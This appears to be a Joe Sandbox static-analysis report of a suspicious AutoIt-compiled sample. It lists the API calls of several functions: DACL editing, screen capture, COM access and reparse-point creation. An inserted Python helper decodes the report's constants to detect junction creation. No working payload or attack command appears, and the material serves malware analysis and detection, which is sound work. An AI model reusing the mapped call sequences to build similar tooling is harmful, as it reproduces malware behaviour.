                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004E46F6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BuffCharMessageSendUpper
                                                                                                                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                            • API String ID: 3974292440-4258414348
                                                                                                                                                                            • Opcode ID: fc3504ed98edd9b071dab944ad8f99ff19f9c4cd749ccf52b4beec464f2a3c77
                                                                                                                                                                            • Instruction ID: 6ee53692c1ded4b0ae3bbd828449120dd66b9a1e8f927099faf9d138e181c10f
                                                                                                                                                                            • Opcode Fuzzy Hash: fc3504ed98edd9b071dab944ad8f99ff19f9c4cd749ccf52b4beec464f2a3c77
                                                                                                                                                                            • Instruction Fuzzy Hash: 2691A4742043418BDB14EF22C451A6EB7E6BF84318F04485EF8955B3A2DB78ED4ACB5A
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadStringW.USER32(00000066,?,00000FFF,004EFB78), ref: 004CA0FC
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                            • LoadStringW.USER32(?,?,00000FFF,?), ref: 004CA11E
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CA177
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CA190
                                                                                                                                                                            • _wprintf.LIBCMT ref: 004CA246
                                                                                                                                                                            • _wprintf.LIBCMT ref: 004CA264
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%O
                                                                                                                                                                            • API String ID: 311963372-2208342716
                                                                                                                                                                            • Opcode ID: a226c154a38e7a408346eff6e005edf97da63097b2759f7d3176dba55702491a
                                                                                                                                                                            • Instruction ID: c349f2e89b7f84f4cdd581105711c27bb564305ecde9c94d65c234645bbab40f
                                                                                                                                                                            • Opcode Fuzzy Hash: a226c154a38e7a408346eff6e005edf97da63097b2759f7d3176dba55702491a
                                                                                                                                                                            • Instruction Fuzzy Hash: 5E51A33190020DABDF15EBE1CD82EEEB779AF04308F10016AF505721A1EB396F59DB66
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00469997: __itow.LIBCMT ref: 004699C2
                                                                                                                                                                              • Part of subcall function 00469997: __swprintf.LIBCMT ref: 00469A0C
                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 004CA636
                                                                                                                                                                            • GetDriveTypeW.KERNEL32 ref: 004CA683
                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004CA6CB
                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004CA702
                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004CA730
                                                                                                                                                                              • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                            • API String ID: 2698844021-4113822522
                                                                                                                                                                            • Opcode ID: be3451f4f042c38f92c39651c8460dcf59cc474aed8b8d7d67e4d7031765d684
                                                                                                                                                                            • Instruction ID: d35eb8deb7b91e2574050bcffc1e4e0d6dbf1157aa3da091d481f7512ab07dae
                                                                                                                                                                            • Opcode Fuzzy Hash: be3451f4f042c38f92c39651c8460dcf59cc474aed8b8d7d67e4d7031765d684
                                                                                                                                                                            • Instruction Fuzzy Hash: C95148752043049FD700EF21C89196AB7E8FF8471CF04496EF89657262EB39EE0ACB46
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004CA47A
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CA49C
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 004CA4D9
                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 004CA4FE
                                                                                                                                                                            • _memset.LIBCMT ref: 004CA51D
                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 004CA559
                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 004CA58E
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004CA599
                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 004CA5A2
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004CA5AC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                                            • String ID: :$\$\??\%s
                                                                                                                                                                            • API String ID: 2733774712-3457252023
                                                                                                                                                                            • Opcode ID: 7b427775743558a9ccbdced4d28aa2ac1b8d1ca41fe8b4b81dd7c512c9489c72
                                                                                                                                                                            • Instruction ID: 75f76221a0e9669ac4b905727af818b40a280fe1819347195a95a9564f72c3f1
                                                                                                                                                                            • Opcode Fuzzy Hash: 7b427775743558a9ccbdced4d28aa2ac1b8d1ca41fe8b4b81dd7c512c9489c72
                                                                                                                                                                            • Instruction Fuzzy Hash: 4D31BF75900149AADB21DFA0DC88FAB73BCEF88705F1040BAFA08D6161E77496598B29
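The record above (function at 004CA47A) lists GetFullPathNameW, CreateDirectoryW, CreateFileW, DeviceIoControl, CloseHandle and RemoveDirectoryW together with the format string "\??\%s". The Python below is an added analyst helper, not code from the report or from the analysed sample: it parses API lines in Joe Sandbox's "Api.MODULE(args), ref: addr" shape, decodes the hard-coded constants from standard Win32 headers (0x000900A4 is FSCTL_SET_REPARSE_POINT, 0x02200000 is FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, 0x40000000 is GENERIC_WRITE, 3 is OPEN_EXISTING) and flags the combination as reparse-point creation, which is how a directory junction is written, with the target expressed in the NT "\??\" namespace. The two sample lines are copied from the listing; the function and table names are mine, and the read of the trailing RemoveDirectoryW as cleanup on FSCTL failure is an interpretation of the call order, not something the report states.

```python
"""Decode the constants in a Joe Sandbox API listing and check whether the
function writes an NTFS reparse point (junction).  Added analyst tooling, not
part of the report or of the analysed sample."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed input: the two calls copied from the 004CA47A function record.
SAMPLE_LINES = [
    "CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 004CA4FE",
    "DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 004CA58E",
]

# Joe Sandbox line shape: "<Api>.<MODULE>(<args>), ref: <addr>"; "?" marks an
# argument the static pass could not resolve.
API_RE = re.compile(r"^(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)$")


def parse_api_line(line: str) -> Tuple[str, str, List[Optional[int]], int]:
    m = API_RE.match(line.strip())
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    api, module, raw_args, ref = m.groups()
    args: List[Optional[int]] = []
    for a in raw_args.split(","):
        a = a.strip()
        # Values are hex; negatives such as "-00000001" are reduced to 32-bit.
        args.append(None if a in ("", "?") else int(a, 16) & 0xFFFFFFFF)
    return api, module, args, int(ref, 16)


# CTL_CODE(DeviceType, Function, Method, Access) field layout from winioctl.h.
DEVICE_TYPES = {0x9: "FILE_DEVICE_FILE_SYSTEM"}
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
KNOWN_FSCTL = {
    0x900A4: "FSCTL_SET_REPARSE_POINT",     # CTL_CODE(9, 41, BUFFERED, ANY)
    0x900A8: "FSCTL_GET_REPARSE_POINT",     # CTL_CODE(9, 42, BUFFERED, ANY)
    0x900AC: "FSCTL_DELETE_REPARSE_POINT",  # CTL_CODE(9, 43, BUFFERED, ANY)
}


def decode_ctl_code(code: int) -> Dict[str, object]:
    """Split an IOCTL into its CTL_CODE fields and name it if it is a known FSCTL."""
    return {
        "device_type": DEVICE_TYPES.get(code >> 16, hex(code >> 16)),
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
        "access": (code >> 14) & 0x3,
        "name": KNOWN_FSCTL.get(code, "unknown"),
    }


GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
CREATE_FILE_FLAGS = {0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
                     0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
                     0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
                     0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN",
                     0x40000000: "FILE_FLAG_OVERLAPPED",
                     0x80000000: "FILE_FLAG_WRITE_THROUGH"}
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def flag_names(value: int, table: Dict[int, str]) -> Tuple[List[str], int]:
    """Split a bitmask into known flag names (ascending bit order) and the
    residue of bits the table does not know."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = sum(bit for bit in table if value & bit)
    return names, value & ~known & 0xFFFFFFFF


def creates_reparse_point(lines: List[str]) -> bool:
    """True when the listing opens an existing object for write with
    BACKUP_SEMANTICS|OPEN_REPARSE_POINT (needed for a directory handle) and
    then issues FSCTL_SET_REPARSE_POINT: the documented way to create a
    junction or other reparse point."""
    opened_for_reparse_write = False
    set_reparse = False
    for line in lines:
        api, _module, args, _ref = parse_api_line(line)
        if api == "CreateFileW" and len(args) >= 6 and None not in (args[1], args[4], args[5]):
            access, _ = flag_names(args[1], GENERIC_ACCESS)
            flags, _ = flag_names(args[5], CREATE_FILE_FLAGS)
            opened_for_reparse_write = (
                "GENERIC_WRITE" in access
                and DISPOSITIONS.get(args[4]) == "OPEN_EXISTING"
                and {"FILE_FLAG_BACKUP_SEMANTICS", "FILE_FLAG_OPEN_REPARSE_POINT"} <= set(flags)
            )
        elif api == "DeviceIoControl" and len(args) >= 2 and args[1] is not None:
            set_reparse = decode_ctl_code(args[1])["name"] == "FSCTL_SET_REPARSE_POINT"
    return opened_for_reparse_write and set_reparse


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        api, module, args, ref = parse_api_line(line)
        print(f"{api}.{module} @ {ref:08X}")
        if api == "CreateFileW":
            print("  access :", flag_names(args[1], GENERIC_ACCESS)[0])
            print("  dispo  :", DISPOSITIONS.get(args[4]))
            print("  flags  :", flag_names(args[5], CREATE_FILE_FLAGS)[0])
        elif api == "DeviceIoControl":
            print("  ioctl  :", decode_ctl_code(args[1]))
    print("creates reparse point:", creates_reparse_point(SAMPLE_LINES))
```

Feed the helper any other API block from this report to name the IOCTLs and CreateFile flags it hard-codes; the residue returned by flag_names shows bits the tables do not cover so that an unknown flag is not silently dropped.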
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
                                                                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004EC4EC
                                                                                                                                                                            • GetFocus.USER32 ref: 004EC4FC
                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 004EC507
                                                                                                                                                                            • _memset.LIBCMT ref: 004EC632
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 004EC65D
                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 004EC67D
                                                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 004EC690
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 004EC6C4
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 004EC70C
                                                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004EC744
                                                                                                                                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 004EC779
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 1296962147-4108050209
                                                                                                                                                                            • Opcode ID: ead8e942d918a888fbe3cec2389380eb437c8df438da2cfe0cd9b31bdd0ccf01
                                                                                                                                                                            • Instruction ID: 3ffee41e63f63b628c99c856124e856ae266b521a5ae51da3aa51ab469a5a823
                                                                                                                                                                            • Opcode Fuzzy Hash: ead8e942d918a888fbe3cec2389380eb437c8df438da2cfe0cd9b31bdd0ccf01
                                                                                                                                                                            • Instruction Fuzzy Hash: 3781AE70108391AFD710DF26C8C4A6BBBE4FF88315F00492EF99597292D734D906CB9A
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004B874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004B8766
                                                                                                                                                                              • Part of subcall function 004B874A: GetLastError.KERNEL32(?,004B822A,?,?,?), ref: 004B8770
                                                                                                                                                                              • Part of subcall function 004B874A: GetProcessHeap.KERNEL32(00000008,?,?,004B822A,?,?,?), ref: 004B877F
                                                                                                                                                                              • Part of subcall function 004B874A: HeapAlloc.KERNEL32(00000000,?,004B822A,?,?,?), ref: 004B8786
                                                                                                                                                                              • Part of subcall function 004B874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004B879D
                                                                                                                                                                              • Part of subcall function 004B87E7: GetProcessHeap.KERNEL32(00000008,004B8240,00000000,00000000,?,004B8240,?), ref: 004B87F3
                                                                                                                                                                              • Part of subcall function 004B87E7: HeapAlloc.KERNEL32(00000000,?,004B8240,?), ref: 004B87FA
                                                                                                                                                                              • Part of subcall function 004B87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004B8240,?), ref: 004B880B
                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004B8458
                                                                                                                                                                            • _memset.LIBCMT ref: 004B846D
                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004B848C
                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 004B849D
                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 004B84DA
                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004B84F6
                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 004B8513
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004B8522
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004B8529
                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004B854A
                                                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 004B8551
                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004B8582
                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004B85A8
                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004B85BC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3996160137-0
                                                                                                                                                                            • Opcode ID: 7cb6adf339e0b3bb8bea093ae3e7be9689e37892145bb02218ec7bcb49c8fbaf
                                                                                                                                                                            • Instruction ID: 0718d158b13c7fb7365f2bef073e5f89408cb3b4dde3a8e1e399a8b4006d8935
                                                                                                                                                                            • Opcode Fuzzy Hash: 7cb6adf339e0b3bb8bea093ae3e7be9689e37892145bb02218ec7bcb49c8fbaf
                                                                                                                                                                            • Instruction Fuzzy Hash: 2561597190020ABFDF10DFA5DC85AEEBBB9FF04304F04812EE815AA291DB349A05CF64
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 004D76A2
                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 004D76AE
                                                                                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 004D76BA
                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 004D76C7
                                                                                                                                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 004D771B
                                                                                                                                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 004D7757
                                                                                                                                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 004D777B
                                                                                                                                                                            • SelectObject.GDI32(00000006,?), ref: 004D7783
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004D778C
                                                                                                                                                                            • DeleteDC.GDI32(00000006), ref: 004D7793
                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 004D779E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: 20b3d8fac2b1b1aead39720ecc73472e41639bd23fd1b4dabf1a057f8255f096
• Instruction ID: ca0ae04a4100359e4a2fb7db8bd24267425767adf89278c1be375a27bf616700
• Opcode Fuzzy Hash: 20b3d8fac2b1b1aead39720ecc73472e41639bd23fd1b4dabf1a057f8255f096
• Instruction Fuzzy Hash: 0F515975904249EFCB14CFA8CC84EAEBBB9EF48310F14842EF94997311E735A945CB64
APIs
  • Part of subcall function 00480B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00466C6C,?,00008000), ref: 00480BB7
  • Part of subcall function 004648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004648A1,?,?,004637C0,?), ref: 004648CE
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00466D0D
• SetCurrentDirectoryW.KERNEL32(?), ref: 00466E5A
  • Part of subcall function 004659CD: _wcscpy.LIBCMT ref: 00465A05
  • Part of subcall function 0048387D: _iswctype.LIBCMT ref: 00483885
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
• String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
• API String ID: 537147316-1018226102
• Opcode ID: fd530f5005d63518b8f64ae2b24fefa7c3c3bd537fb7ac2073ccc69891018487
• Instruction ID: 4323988f7cdc2cf6ed2ba2ad81c16d19194ae69ba1fd3e39fa9f0bfbd7e1a692
• Opcode Fuzzy Hash: fd530f5005d63518b8f64ae2b24fefa7c3c3bd537fb7ac2073ccc69891018487
• Instruction Fuzzy Hash: 150292701083409FCB14EF25C8919AFBBE5BF95318F04492EF485972A1EB39D949CB5B
APIs
• _memset.LIBCMT ref: 004645F9
• GetMenuItemCount.USER32(00526890), ref: 0049D7CD
• GetMenuItemCount.USER32(00526890), ref: 0049D87D
• GetCursorPos.USER32(?), ref: 0049D8C1
• SetForegroundWindow.USER32(00000000), ref: 0049D8CA
• TrackPopupMenuEx.USER32(00526890,00000000,?,00000000,00000000,00000000), ref: 0049D8DD
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0049D8E9
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
• String ID:
• API String ID: 2751501086-0
• Opcode ID: 5fbb7a45d6501291a09f27f3bc6f1aeb3fa6bf02830fbf13faeb723da187f1f3
• Instruction ID: a03366a266c30004489164ae83549bb674ef54c759a172290892c589e84c3bce
• Opcode Fuzzy Hash: 5fbb7a45d6501291a09f27f3bc6f1aeb3fa6bf02830fbf13faeb723da187f1f3
• Instruction Fuzzy Hash: C7711770A00205BEEF209F55DC85FABBF64FF45368F200227F5256A2E1C7B95810DB99
APIs
• VariantInit.OLEAUT32(?), ref: 004D8BEC
• CoInitialize.OLE32(00000000), ref: 004D8C19
• CoUninitialize.OLE32 ref: 004D8C23
• GetRunningObjectTable.OLE32(00000000,?), ref: 004D8D23
• SetErrorMode.KERNEL32(00000001,00000029), ref: 004D8E50
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,004F2C0C), ref: 004D8E84
• CoGetObject.OLE32(?,00000000,004F2C0C,?), ref: 004D8EA7
• SetErrorMode.KERNEL32(00000000), ref: 004D8EBA
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004D8F3A
• VariantClear.OLEAUT32(?), ref: 004D8F4A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
